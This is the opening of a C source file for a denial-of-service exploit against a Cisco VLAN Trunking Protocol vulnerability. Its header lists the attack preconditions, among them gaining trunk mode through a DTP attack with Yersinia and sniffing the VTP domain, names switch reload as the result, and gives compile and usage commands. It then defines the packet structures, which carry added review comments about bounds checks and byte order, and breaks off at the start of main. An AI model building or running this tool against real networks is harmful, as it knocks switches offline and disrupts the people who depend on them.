1 /*DoS code for Cisco VLAN Trunking Protocol Vulnerability
2 *
3 *vulnerability description:
4 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
5 *
6 *Preconditions:
7 * 1. The switch must be in Server/Client mode.
8 * 2. The port the attacker is connected to must be in trunk mode.
9 * Cisco Ethernet ports with no configuration are not
10 * in trunk mode, but trunk mode can be obtained through a DTP
11 * attack with Yersinia.
12 * 3. The VTP domain must be known; it can be sniffed.
13 * 4. Some of the code is taken from Yersinia.
14 *
15 *Result:
16 * switch reload.
17 *
18 *
19 *Compile:
20 * gcc -o vtp `libnet-config --libs` vtp.c
21 *
22 *Usage: vtp -i <interface> -d <vtp_domain>
23 *
24 *Contact: showrun.lee[AT]gmail.com
25 *http://sh0wrun.blogspot.com/
26 */
27 #include <libnet.h>
28 #include <stdio.h>
29 #include <stdlib.h>
30
/* Size in bytes of the fixed-width domain[] field in the VTP headers below. */
#define VTP_DOMAIN_SIZE 32

/* Size in bytes of the timestamp[] field in struct vtp_summary. */
#define VTP_TIMESTAMP_SIZE 12
33
/*
 * Header layout of a VTP summary advertisement as this file declares it.
 *
 * Four single-byte fields come first, then the fixed-width domain name, two
 * 32-bit fields, the timestamp and the digest. Each 32-bit member falls on a
 * 4-byte offset (36 and 40), so on common ABIs the compiler adds no padding
 * and the struct is 72 bytes.
 *
 * dom_len is an 8-bit count, but domain[] holds only VTP_DOMAIN_SIZE bytes and
 * nothing in the type ties the two together. Any code that interprets a
 * received frame through this layout has to reject dom_len > VTP_DOMAIN_SIZE
 * before using it as a length.
 *
 * NOTE(review): the code that fills revision and updater is not visible in
 * this part of the file; confirm it converts them to network byte order.
 */
struct vtp_summary {
    u_int8_t  version;                        /* VTP protocol version */
    u_int8_t  code;                           /* message type code */
    u_int8_t  followers;                      /* count of advertisements that follow */
    u_int8_t  dom_len;                        /* bytes of domain[] in use */
    u_int8_t  domain[VTP_DOMAIN_SIZE];        /* domain name, fixed width */
    u_int32_t revision;                       /* configuration revision number */
    u_int32_t updater;                        /* identity of the last updater */
    u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];  /* time of the last update */
    u_int8_t  md5[16];                        /* MD5 digest carried in the advertisement */
};
45
/*
 * Header layout of a VTP subset advertisement as this file declares it.
 *
 * Only the fixed header is described: four single-byte fields, the
 * fixed-width domain name and a 32-bit revision at offset 36 (40 bytes in
 * total on common ABIs, no padding). Anything that follows the header on the
 * wire is not part of this struct.
 *
 * As with struct vtp_summary, dom_len is an unchecked 8-bit count next to a
 * VTP_DOMAIN_SIZE-byte array; a parser of received frames must bound it
 * before using it as a length.
 *
 * NOTE(review): the code that fills revision is not visible in this part of
 * the file; confirm it converts the value to network byte order.
 */
struct vtp_subset {
    u_int8_t  version;                  /* VTP protocol version */
    u_int8_t  code;                     /* message type code */
    u_int8_t  seq;                      /* sequence number of this subset advertisement */
    u_int8_t  dom_len;                  /* bytes of domain[] in use */
    u_int8_t  domain[VTP_DOMAIN_SIZE];  /* domain name, fixed width */
    u_int32_t revision;                 /* configuration revision number */
};
54
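/*
 * Print the command-line synopsis to stdout and terminate the process.
 *
 * The option dashes are written as ASCII '-'. The listing carried U+2212
 * minus signs here, which made the printed synopsis differ from the options
 * a user actually types.
 *
 * s: program name shown at the start of the synopsis. A NULL pointer is
 *    replaced by "vtp" (the binary name used in the file header) because
 *    passing NULL to "%s" is undefined behaviour.
 *
 * Does not return: always calls exit(1).
 */
void usage(const char *s)
{
    const char *prog = (s != NULL) ? s : "vtp";

    printf("%s -i <interface> -d <vtp domain>\n", prog);
    exit(1);
}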
59
60 int main( int argc, char *argv[] )
61 {
62 int opt,k=0;
63 extern char *optarg;
64 libnet_ptag_t t;
65 libnet_t *lhandler;
66 u_int32_t vtp_len=0, sent;
67 struct vtp_summary *vtp_summ;
68 struct vtp_subset *vtp_sub;
69 u_int8_t *vtp_packet,*vtp_packet2, *aux;
70 u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
71 u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };